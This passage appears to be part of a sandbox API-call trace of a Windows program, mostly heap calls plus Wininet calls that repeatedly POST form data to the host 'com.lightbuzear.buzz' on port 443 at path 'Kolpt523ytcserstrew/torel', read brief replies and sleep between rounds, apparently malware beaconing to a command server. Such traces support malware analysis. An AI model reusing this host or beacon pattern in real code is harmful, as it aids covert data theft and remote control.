Size=0x13) returned 0x480b590 [0235.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815650 [0235.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830750 [0235.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830750 | out: hHeap=0x4780000) returned 1 [0235.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0235.335] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0235.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0235.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0235.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0235.335] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815788 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815788 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830930 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0235.336] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830930 | out: hHeap=0x4780000) returned 1 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830520 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0235.336] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830638 [0235.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0235.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0235.337] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0235.337] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0235.337] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830638 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815788 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815530 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815788 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0235.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815530 | out: hHeap=0x4780000) returned 1 [0235.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830548 [0235.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0235.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0235.348] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830548 | out: hHeap=0x4780000) returned 1 [0235.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307f0 [0235.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0235.348] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830610 [0235.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0235.349] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0235.349] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0235.349] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0236.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830610 | out: hHeap=0x4780000) returned 1 [0236.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0236.573] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0236.573] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0236.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0236.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0236.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0236.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0236.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0236.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0236.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0236.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815788 [0236.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0236.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815788 | out: hHeap=0x4780000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0236.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0236.604] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830700 [0236.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0236.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830700 | out: hHeap=0x4780000) returned 1 [0236.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830930 [0236.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0236.605] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830868 [0236.605] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0236.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0236.606] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0236.606] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0236.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830868 | out: hHeap=0x4780000) returned 1 [0236.607] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0236.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0236.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0236.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0236.607] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0236.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815788 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815788 | out: hHeap=0x4780000) returned 1 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830778 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830778 | out: hHeap=0x4780000) returned 1 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48305c0 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0236.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830570 [0236.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0236.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0236.609] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0236.609] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0236.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830570 | out: hHeap=0x4780000) returned 1 [0236.609] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0236.610] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0236.610] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0236.610] FreeLibrary (hLibModule=0x71570000) returned 1 [0236.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0236.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0236.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830908 | out: hHeap=0x4780000) returned 1 [0236.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830818 | out: hHeap=0x4780000) returned 1 [0236.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0236.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0236.611] Sleep (dwMilliseconds=0x2710) [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815680 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0236.636] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815788 [0236.636] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0236.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0236.637] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0236.637] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0236.637] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815680 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815680 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48303e0 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0236.638] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48303e0 | out: hHeap=0x4780000) returned 1 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48303e0 [0236.638] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0236.639] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48306b0 [0236.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0236.639] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0236.640] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0236.640] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0236.640] FreeLibrary (hLibModule=0x71780000) returned 1 [0236.640] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48306b0 | out: hHeap=0x4780000) returned 1 [0236.640] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0236.640] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830688 [0236.640] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0236.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815680 [0236.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48307a0 [0236.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48307a0 | out: hHeap=0x4780000) returned 1 [0236.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48304a8 [0236.642] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48305e8 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0236.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0236.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0236.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0236.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815560 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48156f8 [0236.643] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48308b8 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48308b8 | out: hHeap=0x4780000) returned 1 [0236.643] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0236.643] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0236.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0236.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0236.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0236.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0236.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0236.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a70 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a88 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a70 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a88 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48304f8 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0236.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0236.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48304f8 | out: 